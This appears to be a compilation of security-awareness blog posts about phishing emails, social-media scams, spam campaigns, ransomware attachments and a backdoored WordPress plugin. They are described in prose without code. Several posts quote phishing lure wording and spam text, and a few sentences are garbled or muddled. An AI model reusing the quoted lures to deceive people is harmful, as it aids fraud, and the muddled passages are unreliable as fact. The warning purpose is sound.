Celine Dion's website becomes unusual spam launchpad, astonishes fans

Singer Celine Dion recently had her website showing something unusual. The Canadian vocalist’s website viewed a hockey related spam, surprising her fans all over the world.
(pc- malwarebytes.org)


Partial text below:
///Fox Tv//Czech Republic vs Austria Live Stream Hockey World Championship Online
 
Watch Czech Republic vs Austria Wild live lead series 2015, TODAY Watch Canadiens vs. Senators Live Online Video Streaming, NHL playoffs 2015: Time, TV schedule and how to watch Game 3 online, Watch Czech Republic vs Austria Wild Stream Stanley Cup Playoffs Live Free Sports Live Streaming - Channel 1.Watch Czech Republic vs Austria Wild Stream Stanley Cup Playoffs Live - Free Sports Live Streaming - Channel 1.You can follow Game 2 with CBC Ottawa as Dan S├ęguin and Stu Mills live-tweet from inside and outside the Bell Centre in Montreal.Ottawa Senators Curtis Lazar gets hilt by Montreal Canadiens Alexi Emelin during first period action at the Bell .... LIVE: Ottawa Senator

Official sites of celebrities as spam launchpads are somewhat unthinkable.  Posts of “online free video streaming” are usually posted on sites which offer free registration and nonexclusive posts. Dion, therefore, is definitely an exception.
(pc- malwarebytes.org)

The spam was seen on the celebrity’s photo gallery in her website. It is similar to the posts on the website ‘malwarebytes unpacked’ as it resembles the spam posts on steam (blogging domain like slideshare, twitter, soundcloud etc.).

The issue is however with a plugin allowing registered users in the site to upload fan photographs. The admins might have foreseen the spam images appearing with the clickable text. The visitors are then asked for personal information and payment details after clicking on the spam link.

Beware of emails with resume attachments as Phishers still use JavaScript attachments


Beware of emails with an attached resume from a job applicant because some of the hackers are still using old JavaScript attachments to deliver the CryptoWall which could leave people in great trouble.

In an article by Brian Bebeau posted on SpiderLabs Blog (Trustwave SEG Cloud), mentioned that recently, it was noticed that a spam run of emails which contained an attached resume from a job applicant. The attachment, with a file extension ‘.js’, was in plain-text and consisted of JavaScript.

After some days, the next spam was noticed which looked more serious and zipped the attachment. The hackers tried to give the attachment a MIME type of "image/png" in order to appear it as an image among the people.

If anyone retrieves the picture, it will turn out to be a Windows executable.

Bebeau wrote that after analysing the file, they came to know that this is a Cryptowall ransomware variant. So, if anyone opens the attachment to look a resume or picture, he/she could end up with his/her entire system in trouble.

He added that some group of spammers also uses JavaScript to hide their phishing attachments. Instead of a resume, they used that old standby, the common account phish.

Bebeau wrote that people can verify an email by looking at the header addresses, before opening the attachments.

Subject lines include:

- Un-authorized User
- Verification Required
- Must verify your account
- Validate account

He said that it is said that people’s account has been limited or disabled, and that to restore their account, they must follow some steps in the attachment.

Now, the attachment is an HTML file with a JavaScript section which instructs people to turn on JavaScript. If they view the attachment in a JavaScript-enabled browser, it creates a form which asks for their personal information.

The form asks for peoples’ social security number and their credit card number along with their name and address. And if anyone fills it and clicks submit button, his/her all data goes to a server in Russia.

According to Bebeau, if people can examine an attachment carefully, it can be a useful to pull JavaScript code for content blocking.

He wrote that, Trustwave SEG Cloud, blocked around 200 of these phishing messages within three days. People should not turn on JavaScript even if some email asks them to do so.

Fake Facebook: Don't give your details away


A new phishing scam designed to steal your Facebook data has come to light. You might be receiving a mail or a message on social media asking you to recover your Facebook account, before it is permanently closed.

The scam is focused on getting Facebook credentials, along with phone number and date of birth of a user. The scam came to light beacuse of the bad English in the message.

Aside from that, the page where you enter your details (the phishing page) is hosted on cloud sharing website Dropbox, allowing for all data you input to be conveniently for the hacker or hackers.

The details are then posted online on a .PHP page, preferably to be sold. No official word is yet out from Facebook on the matter, but www.blog.malwarebytes.org has cautioned users to be careful before responding to any such message, suspected to be from hackers.

Employee email accounts of Children's National Health System targeted with Phishing emails


Children's National became a victim of a cyber-attack, after its employees responded to phishing emails by hackers believing they were legitimate.

The issue came to light on December 26 last year and Children's National believes that any potential unauthorized access of its employees email accounts could have taken place between July 26 and December 26 last year.

Children's National has come out to say that Patient History Information of various patients in the affected email accounts has been put at risk, and although it has not received any information regarding the misuse of this information, affected people are being informed to stay on the lookout for discrepancies in their insurance statement.

On learning of the incident, Children's National immediately secured the emails accounts of the affected employees and began an investigation into the matter. They hired an external forensics firm to carry out their investigation into the matter.

They implemented new safety features and reviewed its systems to upgrade the security of their network. They have also setup a dedicated call centre with a helpline number for getting in touch with the affected patients.

Don't cook your iPhone with Microwave oven


There is an Internet hoax circulating around claiming users of Apple's IOS 8 can charge their iPhone by putting it in the microwave oven.

The hoax ad was posted in 4chan and stated "Wave is our latest and greatest addition to iOS8. Wave allows your device to be charged wirelessly through microwave frequencies.  Wave can be used to quickly charge your device's battery using any standard household microwave"

I don't think anyone fall for this hoax. But it is funny to read the ad and tweets about it.

Last year, when iOS7 was first launched, some pranksters made a similar fake ad claiming updating to the iOS7 made phones waterproof.  Many people reportedly fell for that hoax.

Facebook hoax "Prayers for Like"


The message is a disgraceful hoax designed to get maximum number of likes for a facebook page and further promote it through sharing the message.

A baby's photograph was taken out illegally from a personal facebook profile and is circulated without the parents permission. Unfortunately the baby from the photograph died two weeks after her birth. As the baby's picture is being circulated without the parents permission, it is causing great pain to them. If this hoax message comes your way, do not like or share it. Advisory, report this particular message to Facebook.

According to the facebook's currently distributed hoax message, you can offer prayers to this baby girl by liking or sharing the picture. However, liking or sharing the particular message would not help the baby, infact would cause considerable distress to the parents and make them belligerent.

The people who create these messages are highly motivated by the green eyed monster and look through the children whose pictures they misuse. Facebook pages with large number of likes are a source of black market and can also be sold to inhumane internet marketers and used to make further scam and hoax messages.

Believes of offering prayers for someone who is unfotunate is sane but reciprocating it through social networking sites is simply absurd. Are we to believe on a denigrating fact that, “almighty has a deal with facebook that one shrare contributes hundred prayers?”

Not only this it can also be seen on other pages including images of God and Godesses and they ask for a like or comment to seek There blessings.Well its ironical that even the Almighty now needs likes, shares and comments on their images for blessing the mankind.Huh.Well my suggestion is open up your eyes and think broadly.

If this message comes your way, do not like, share or comment on such a post. It plays in favour of inhumane and immoral people who earn from such hoaxes.

The company needs to take action that ensures that these scam messages are removed from the network as quickly as possible.

Moreover, facebook has actually removed some of the messages, as they have been reported a number of times. The company should ensure that these hoaxes are removed from the network as quickly as possible.

Phishing mail says 'DSVX virus' detected in Your Yahoo Mail


If you are getting emails saying that a virus detected in Your Yahoo Email account, ignore the emails.  It is none other than another tricky method used by cybercriminals to fool users.

Hoax-slayer has spotted a fake email claiming to be from Yahoo informs recipients that it has detected a so-called DSVX virus in your yahoo mail account and you have to update your account.

The email warns the recipients that if they failed to update, they will lose access to their email address.

It also claims the update will give latest spam protection, faster email and unlimited storage facility. 

To update their email, it asks the recipients to send their username, email id, password, email security question and answer, country, phone number and Date of Birth by clicking the Reply Button.

Keep in mind that Yahoo or any other organizations are never going to ask you to send your username and passwords or any other sensitive data via an unsecured email.

Scam Alert: Your Facebook Accounts will be Permanently Disabled

We have seen large numbers of facebook posts that promise something, but it turns out to be a scam.  Fb users are still believing such kind of posts and blindly following the instructions.  So, Cyber criminals are keep coming up with new themes to trick users.

Over the past few days, i have been receiving a facebook notifications informing that one of my friends mentioned me in a comment.  I had a look at the post, it is none other than a facebook scam.

The scam posts says "to all facebook users Your Facebook Accounts will Permanent Disable. you must register your account to avoid permanent disabled . How to register? Go to our pinned post. and follow instructions carefully!" 

It asks you to copy and paste some code in the console of your browser.  By blindly following the instructions of scammers,  users are allowing scammers to do various actions('like', 'sharing', 'tagging friends' and more) on their behalf.

Earlier this year,  we learned that scammers were tricking users by promising them that following the instructions will help them to hack their friends' accounts.

Cybercriminals abusing Microsoft Azure for phishing attacks


CyberCriminals usually host fake web pages on hacked websites, free web hosting, more recently they abused Google Docs.  These fake pages(phishing pages) trick unsuspecting users into handing over their personal and financial information.

Now, the cyber criminals have started to abuse the Microsoft's Azure cloud platform to host their fake websites.

Creating accounts on Azure is very easy and they are also offering a 30-day trial.  Once you are done with account creation, you can easily create your web pages using the main dashboard.

However, Registration process is not easy for criminals.  Because, it needs you to provide a valid phone number and credit card details.

MalwareBytes researchers says the attackers may have stolen the username and passwords from legitimate users that were already registered.

Netcraft has identified several phishing pages targeting users of Paypal, Apple, Visa, American express, Cielo hosted on Azure.

PhishTank records:
http://www.phishtank.com/phish_detail.php?phish_id=2428419
http://www.phishtank.com/phish_detail.php?phish_id=2391951
http://www.phishtank.com/phish_detail.php?phish_id=2342647
http://www.phishtank.com/phish_detail.php?phish_id=2174737

Beware of fake versions of Malwarebytes Anti-Malware 2.0 claiming to be free


It is always suggested not to download cracked versions of software, if you are really concerned about your Desktop security.  But, Downloading a cracked version of Antivirus or from unknown sources is height of stupidity.

MalwareBytes recently released new version 2.0 of the MalwareBytes Anti-Malware(MBAM). Cyber criminals have now started to trick users into installing the fake versions of this security application.

Researchers at Malwarebytes have come across a number of websites offering free version their software, but are actually potentially unwanted programs.

These bogus applications are capable of making itself run every time, whenever the system is restarted.  They are also capable of accessing your browser cookies, list of restricted sites and browser history.

These apps also blocks users from accessing certain websites by adding them to Internet Explorer's restricted zone, which includes wikia, gamespot, Runescape online.

The security firm also have spotted premium version of MBAM with key generators on torrent websites.  But, in this particular case, users are asked to fill survey in order to download the app.  Filling these kind of surveys will help the cybercriminals to earn money. 

Emails promising CNN article about HeartBleed vulnerability leads to Spam sites

Cyber Criminals often take advantage of hottest topics and latest events to entice users into visiting spam websites. The HeartBleed bug, which has made headlines over the past few weeks, is no exception.

Now, spammers are sending out emails with subject "HeartBleed Bug warning". The spam campaign was discovered by Security researchers at TrendMicro. 

"I Just want to let you know there is a big security concern now in the internet.  The Internet bug called Heartbleed Bug, was recently discovered by experts.  So if were you, you need to change your internet passwords specially your banking passwords." The spam email reads.

"Check for this report in CNN. Report from CNN[LINK]"

If the link provided in the email led to the actual CNN report, the email may have been considered as cyber security awareness email.  But, the link leads to some malicious webpage.

One good thing what spammers did is notifying users about the HeartBleed vulnerability and suggest recipients to change their password.  If the link provided in the email.

Phishing pages trick Steam users to Upload SSFN file

Is Steam login page asking you to upload SSFN file? Think twice before uploading, because the legitimate steam site never asks you to upload SSFN file.

Steam Guard is extra layer of security.  It will ask you to enter a verification code sent to your email, whenever you try to log in from a computer you haven't used before.

This feature will prevent attackers from taking control of your steam account, even if they know your login id and password. 

However, there is new Phishing scam uncovered by MalwareBytes that bypasses the Steam Guard protection.  It tricks users into handing over their login credentials and the SSFN file.

What is SSFN File?
SSFN is the file that avoids you from having to verify your identity through Steam Guard every time you login to Steam on your computer.  If an user deletes this file, he will be asked to verify again and new SSFN file will be generated and stored in your pc.

If you upload your SSFN file to a phishing page, attackers can use this file with username &password to take control of your account.

In a reddit thread, several users have reported that they got fooled by this phishing scam.

"Steam will never ask you to provide any Steam Guard files. If you upload or give a user your Steam Guard .SSFN file, they can gain access to your account without accessing your email account. However, they must know your Steam account password and username to use this file" Valve article about Steam Guard reads.

European Apple users targeted with phishing emails

A new phishing campaign targeting European users of Apple store which promises to offer a discount.

Security researchers at Kaspersky have spotted a new spam mail targeting Apple users, tricks users into thinking that they can get discounts of 150 euros by just paying 9 euros.

"Apple is rewarding its long-term customers.  Your loyalty for our products made you eligible for buying an Apple discount card" The spam mail reads.

The spam mail asks users to download an attached HTML file and fill the form, where users are being asked to enter personal information as well as credit card information.

The scammers spoofed the email address such that it makes the email pretending to be from informs@apple.com.  They also promised to send the discount card within 24 hours, after filling the form.

If a recipient follows the instructions and fill the form, the phishing file will send the data to the attacker server.  The attacker will use the given financial data. 

Users targeted with large number of Spam mails containing Banking Trojan

 
A new massive spam campaign has been spotted by security researchers at AppRiver which sends large amount of spam mails to data centers in an effort to evade Email-filtering engines.

AppRiver's data centers received 10 to 12 times normal traffic.  Even though AppRiver managed to block the spam mails, tremendous volume of traffic caused some of its customers delays in sending and receiving emails.

CyberCriminals are targeting users with large amount of emails with varying premise.  One of the spam mails is targeting Bank of America customers.  A fake alert message pretending to be from Bank of America contains a Bredo malware.

Researchers say the malware is capable of recording the keystrokes and steal financial information.  It has also capabilities to do download additional malware on the victim's machine.  The spam mails reportedly detected only by 11 out of 51 antiviruses.

Another mail analyzed by AppRiver is pretending to be from "VISA/MasterCard" and informs recipients that their account has been blocked due to unusual activity.

Some of the malicious attached files have pointed to Andromeda botnet and some other pointing to Bredo Botnet.  This botnet activity being referred as TidalWave/TidalBotnet by AppRiver.

Facebook Scams: "Hacking any Facebook Account", "Facebook Music Theme"


A new facebook scam which is claimed to be a script to "Hack any Facebook account" is spreading like Wildfire.  Recently, i also came across a facebook scam post that promise a "Facebook Music Theme". I've been tagged in the spam posts by more than 20 friends within a week.

The post has a link to a script file which is randomly hosted in dropbox, pastebin, textuploader and other file hosting services.

The post tricks users into thinking that it is a script to hack any facebook accounts.  It urge users to use it before it is getting blocked by facebook.

It asks them to copy the script and paste in the "console" section of the "inspect element" option in your browser.  It claims you will get username and password once you done the process.


Here is what exactly happening:
When you execute paste the code in the console section, it will run the code on behalf you.  So, it will send several requests including "Like" & "comment" request".  It means that you are unknowingly "liked" and "commented" on the scammer's pages.


It also tag all of your friends in a comment so that it can spread the scam further and get more victims.

I can't believe that there are still plenty of people out there who still believe some stupid scripts can hack accounts.

Are you one of the victim who followed the stupid instructions? 
No need to panic.  As far as i know, the script only "likes"& "comments" on behalf you.  So, you can simply go to "Activity" log page in your account and unlike & uncomment them.  If you are reading this article, make sure you are not doing the same mistake again.

Facebook Scam: World's Largest Snake Video and Shark Eating Man Videos

Facebook Survey Scam
Attention Facebook users ! If you are seeing a Facebook post promising outrageous videos, for instance"Shocking video: World's Largest Snake Video, Don't click it, It is nothing other than Survey Scam.

There are various facebook posts circulating with different bogus title in facebook that leads to a survey scam page.

So far, the topics used in the scam campaign are " SHOCKING VIDEO World’s Largest Snake Found In [Brazil /Mexico ]", "Exclusive: Shark eats the swimming man in an Ocean!! Watch the video".

Facebook Scam post
The user who clicks the link in the post will be taken to a web page where they are asked to complete the survey in order to view the video and share the video in their facebook account.

At the end, you will get nothing other than being a victim of the scam.  Remember, there is no such videos.  If you come across these kind of posts, just ignore it /report it to Facebook.

Spam mail promising Adobe License key delivers Trojan

 Adobe has issued a warning about a new spam email campaign which is purporting to deliver License key for a variety of Adobe products.  

Security researchers at MX Lab, have come across the spam emails with the subjects such as "Download your License Key", "Than you for your order" that distributes a new Trojan.

The attacker managed to spoof the email address so that it will appear to be from Adobe Inc.  The email thank the recipient for buying a various Adobe products and informs them "License Key" is attached with the email.


Those whose eagerly searching for a new License key definitely open the attachment.  The attached file "License_Key_OR8957.zip" is nothing but a malware.

At the time of writing, 27/49 Antivirus engines detect it at VirusTotal.  It appears the cyber criminal use the same technique from 2011.

Nigerian man jailed for $1.5 m phishing scam targeting students

A Nigerian man has been sentenced to three years and nine months for taking part in a $1.5 m phishing scam targeting UK students.

Olajide Onikoyi, 29-year-old, from Manchester, was one of the person of a criminal group who targeted students by sending phishing emails inviting them to update student load details.

According to SKY News, he laundered £393,000 from 238 victims in total, including one student who had £19,000 taken from his account.

When Metropolitan police central e-crime unit seized his computers, they found a chat logs that revealed he was conspiring with criminals in Russia, Lithuania and UK.

A number of other people have also been jailed in connection with the scam.

Users are all advised to be extreme caution when clicking links in unsolicited emails, log into the websites directly by entering the url of the site instead of clicking the link.

Halifax Bank phishing email claims "3rd party Intrusion detected"


A phishing email targeting UK-based Halifax Bank users attempt to trick recipients into handing over their sensitive information.

The email informs the recipients that "3rd party intrusions" have been detected and their account has been limited for security reasons, according to Hoax-slayer.

To restore the account, it asks recipients to confirm their identify and verify that their account has not been used for fraud purposes, by filling an online validation form.

Once the victim opened the link provided in the email, it will take them to a fake Halifax Bank website where it will ask them to log in.  Then, it will ask victims to enter their personal information such as name, phone number, birth dates.

In next form, they will be asked to enter sensitive information such as Account Number, sort code, card number, expiration date and security code.

As usual in phishing scams, once the form is filled, the victim will be automatically redirected to the legitimate Halifax Bank website.

WordPress Plugins containing Backdoor distributed via phishing emails

What would you do when you receive an email offering Pro version of Wordpress plugin for free, if you are a WordPress user? Don't get tempted by such kind of emails, they also give malicious code for free!

Sucuri reported about a phishing emails asking their clients to download Pro-version of "All in one SEO Pack" WordPress plugin.  The email claims that the plugin is $79.00 worth and giving it for free.

"You have been chosen by WordPress to take part in our Customer Rewarding Program.  You are the 23rd from 100 uniques winners." The phishing email reads.

Credit : Sucuri

The download link provided in the email is not linked to WordPress plugin store, it is linked to a zip file hosted in a compromised website.

Security researchers at Sucuri analyzed the plugin and found out that it is modified with a Backdoor which gives attackers full access to the server.

The malicious code in the plugin replaces the index.php file with the malicious code retrieved from the attacker's server.  So, when user visit the site, they either redirected to SPAM sites or to Exploit kits where it will infect the visitor's system.